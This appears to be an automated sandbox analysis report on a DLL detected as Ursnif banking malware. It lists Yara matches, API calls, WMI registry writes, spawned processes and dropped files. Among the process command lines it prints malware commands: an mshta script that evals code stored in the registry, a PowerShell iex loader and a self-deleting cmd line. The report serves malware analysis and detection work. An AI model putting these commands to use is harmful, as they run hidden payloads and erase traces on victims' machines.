                      Source: Yara matchFile source: 00000003.00000003.500530669.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348921870.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348876810.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.349079600.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.393934520.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.395608793.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.349095553.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348687637.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348979060.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.394913603.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348760397.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6240, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3172, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51f6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51f6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.500530669.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C75FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

                      barindex
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: rXN8OIpbzz.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C7829C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C71645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C74BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CD3DB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CC154D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CB67CA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CCD7F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CCFF4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CBB238
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CC8E57 CreateProcessAsUserW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C7190C GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C76D0A NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C74321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C784C1 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CB74AE NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CBC431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CC0782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CC00DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CCA806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CC61AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CC2331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CB64C4 memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CB36BB NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CBB7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CBD77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CB10C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CC3829 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CC7950 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CCEAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CC5220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CC5312 NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError,
                      Source: rXN8OIpbzz.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs rXN8OIpbzz.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: rXN8OIpbzz.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: rXN8OIpbzz.dllReversingLabs: Detection: 40%
                      Source: rXN8OIpbzz.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Exhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Exhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iwcfhbmkpt -value gp; new-alias -name yuxesb -value iex; yuxesb ([System.Text.Encoding]::ASCII.GetString((iwcfhbmkpt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nthaltvx.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3047.tmp" "c:\Users\user\AppData\Local\Temp\CSCFB39A903173B4FAEAF71F3E48EC5D0FF.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zn133k50.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4508.tmp" "c:\Users\user\AppData\Local\Temp\CSC41D8DEC26D8340F3B72514D252AF5890.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\rXN8OIpbzz.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iwcfhbmkpt -value gp; new-alias -name yuxesb -value iex; yuxesb ([System.Text.Encoding]::ASCII.GetString((iwcfhbmkpt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nthaltvx.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zn133k50.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3047.tmp" "c:\Users\user\AppData\Local\Temp\CSCFB39A903173B4FAEAF71F3E48EC5D0FF.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4508.tmp" "c:\Users\user\AppData\Local\Temp\CSC41D8DEC26D8340F3B72514D252AF5890.TMP"
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\rXN8OIpbzz.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220504Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r45uapby.kca.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@26/15@0/1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C768BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{6861BC3D-A755-DAD6-711C-CBAE35102FC2}
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{34651F6E-03CF-86A8-2DA8-E71AB15C0BEE}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: rXN8OIpbzz.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: tr0.Pdb source: csc.exe, 00000013.00000003.432123181.0000020BAB5E2000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000013.00000002.432715372.0000020BAB5E4000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000013.00000003.431620364.0000020BAB5DF000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000013.00000003.431571304.0000020BAB5D5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000013.00000003.431604960.0000020BAB5D9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.453885156.00000000060F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: rXN8OIpbzz.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.453885156.00000000060F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C7828B push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C77EA0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CB3495 push ecx; mov dword ptr [esp], 00000002h
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CD3D9F push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CD38A0 push ecx; ret
                      Source: rXN8OIpbzz.dllStatic PE information: section name: .erloc
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CBEC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,
                      Source: nthaltvx.dll.19.drStatic PE information: real checksum: 0x0 should be: 0x824a
                      Source: zn133k50.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x6e67
                      Source: rXN8OIpbzz.dllStatic PE information: real checksum: 0x79835 should be: 0x74d07
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nthaltvx.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zn133k50.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nthaltvx.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zn133k50.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\zn133k50.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nthaltvx.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348921870.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348876810.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.349079600.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.393934520.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.395608793.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.349095553.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348687637.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348979060.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.394913603.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348760397.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6240, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3172, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51f6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51f6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.500530669.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\rXN8OIpbzz.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\rXN8OIpbzz.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
